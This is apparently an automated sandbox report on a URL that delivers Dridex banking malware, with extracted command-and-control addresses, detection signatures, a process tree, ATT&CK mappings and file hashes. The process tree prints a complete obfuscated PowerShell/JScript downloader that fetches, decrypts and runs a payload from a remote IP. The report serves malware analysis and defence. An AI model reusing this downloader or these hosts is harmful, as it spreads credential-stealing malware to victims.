Overview

overview

10

Static

static

URLScan

urlscan

http://traffic.allin...

windows10_x64

10

Analysis

  • max time kernel
    62s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    17-02-2021 01:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    http://traffic.allindelivery.net/

  • Sample

    210217-6y6y4s5q46

Score
10/10
dridex10111botnetcryptonediscoveryevasionloaderpackertrojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

188.165.17.91:8443

185.216.27.185:8172

182.254.209.230:6516
rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • CryptOne packer 2 IoCs

    Detects CryptOne packer defined in NCC blogpost.

    cryptonepacker
  • Dridex Loader 2 IoCs

    Detects Dridex both x86 and x64 loader in memory.

    botnetloader
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Program crash 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 18 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://traffic.allindelivery.net/
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1144
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1144 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3552
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.84.168/?NDg1NTk1^&IPLa^&oa1n4=x3rQcvWYaRyPCYjDM__dSqRGP0vYHliIxY2Y^&s2ht4=n6rVCJ2vfzSj2bCIEBj38V7dSTvSgfdOKa1Ubge-jgeDLgYOmMxZC1lE87etzkWNylafsJSE-UOJNQ5H-5KWQrVo2w_xyLJCdM8kxRWB7WFTmelJUQwT5AlCmP3PEqXIqRR0V0ZjUgvKJ5ojpRTGWSS-NTx3sfS6RDN2nu3K9cd3wZNt0R2v9w^&LaPhnNpVRMTUyNg== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1408
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.84.168/?NDg1NTk1^&IPLa^&oa1n4=x3rQcvWYaRyPCYjDM__dSqRGP0vYHliIxY2Y^&s2ht4=n6rVCJ2vfzSj2bCIEBj38V7dSTvSgfdOKa1Ubge-jgeDLgYOmMxZC1lE87etzkWNylafsJSE-UOJNQ5H-5KWQrVo2w_xyLJCdM8kxRWB7WFTmelJUQwT5AlCmP3PEqXIqRR0V0ZjUgvKJ5ojpRTGWSS-NTx3sfS6RDN2nu3K9cd3wZNt0R2v9w^&LaPhnNpVRMTUyNg== 1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:376
          • C:\Windows\SysWOW64\wscript.exe
            wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.84.168/?NDg1NTk1&IPLa&oa1n4=x3rQcvWYaRyPCYjDM__dSqRGP0vYHliIxY2Y&s2ht4=n6rVCJ2vfzSj2bCIEBj38V7dSTvSgfdOKa1Ubge-jgeDLgYOmMxZC1lE87etzkWNylafsJSE-UOJNQ5H-5KWQrVo2w_xyLJCdM8kxRWB7WFTmelJUQwT5AlCmP3PEqXIqRR0V0ZjUgvKJ5ojpRTGWSS-NTx3sfS6RDN2nu3K9cd3wZNt0R2v9w&LaPhnNpVRMTUyNg== 1
            5⤵
            • Blocklisted process makes network request
            • Suspicious use of WriteProcessMemory
            PID:3508
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c hlzo3.exe
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3020
              • C:\Users\Admin\AppData\Local\Temp\hlzo3.exe
                hlzo3.exe
                7⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                PID:1456
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 2820
        3⤵
        • Suspicious use of NtCreateProcessExOtherParentProcess
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:720

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    88acae3e364010e82fb022c29ab69c9d

    SHA1

    043f08caaf36d317c60977dd9bdaa2be62ed54a0

    SHA256

    f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b

    SHA512

    38283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\hlzo3.exe
    MD5

    86954f76b5c0fbb1cb6ea492711869e2

    SHA1

    081e3460fc0c6e6e6cd1b17b4a8f6b949a88db02

    SHA256

    ffd6ae5e716b2cade6d3365fb9440a5a67f37d3c249d78bdea9e5ef3d39ce52c

    SHA512

    4b77cff3caf6966c50bcde7185173ae5c536058e1cd29d05bf439b6021572d856e40af547f22270c7c91bd13aaf3f76941eab9bc298a52724e965067d9825e69

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\hlzo3.exe
    MD5

    86954f76b5c0fbb1cb6ea492711869e2

    SHA1

    081e3460fc0c6e6e6cd1b17b4a8f6b949a88db02

    SHA256

    ffd6ae5e716b2cade6d3365fb9440a5a67f37d3c249d78bdea9e5ef3d39ce52c

    SHA512

    4b77cff3caf6966c50bcde7185173ae5c536058e1cd29d05bf439b6021572d856e40af547f22270c7c91bd13aaf3f76941eab9bc298a52724e965067d9825e69

    Download Submit
  • memory/376-23-0x0000000000000000-mapping.dmp
    Download
  • memory/720-4-0x0000000004BA0000-0x0000000004BA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/720-5-0x0000000004BA0000-0x0000000004BA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-17-0x0000000007E70000-0x0000000007E71000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-22-0x0000000009210000-0x0000000009211000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-11-0x00000000074D0000-0x00000000074D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-12-0x0000000006C90000-0x0000000006C91000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-13-0x00000000075A0000-0x00000000075A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-14-0x00000000046C0000-0x00000000046C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-15-0x00000000046C2000-0x00000000046C3000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-16-0x0000000007480000-0x0000000007481000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-3-0x0000000000000000-mapping.dmp
    Download
  • memory/1408-18-0x0000000007CB0000-0x0000000007CB1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-19-0x0000000008C70000-0x0000000008C71000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-20-0x0000000008970000-0x0000000008971000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-21-0x0000000008BD0000-0x0000000008BD1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-10-0x0000000006BD0000-0x0000000006BD1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-9-0x0000000006D30000-0x0000000006D31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-7-0x000000006E7D0000-0x000000006EEBE000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/1408-8-0x00000000045E0000-0x00000000045E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-26-0x00000000046C3000-0x00000000046C4000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1456-28-0x0000000000000000-mapping.dmp
    Download
  • memory/1456-31-0x0000000000400000-0x000000000043D000-memory.dmp
    Filesize

    244KB

    Download
  • memory/1456-32-0x0000000002270000-0x00000000022AC000-memory.dmp
    Filesize

    240KB

    Download
  • memory/1456-33-0x0000000000400000-0x000000000043D000-memory.dmp
    Filesize

    244KB

    Download
  • memory/3020-27-0x0000000000000000-mapping.dmp
    Download
  • memory/3508-24-0x0000000000000000-mapping.dmp
    Download
  • memory/3552-2-0x0000000000000000-mapping.dmp
    Download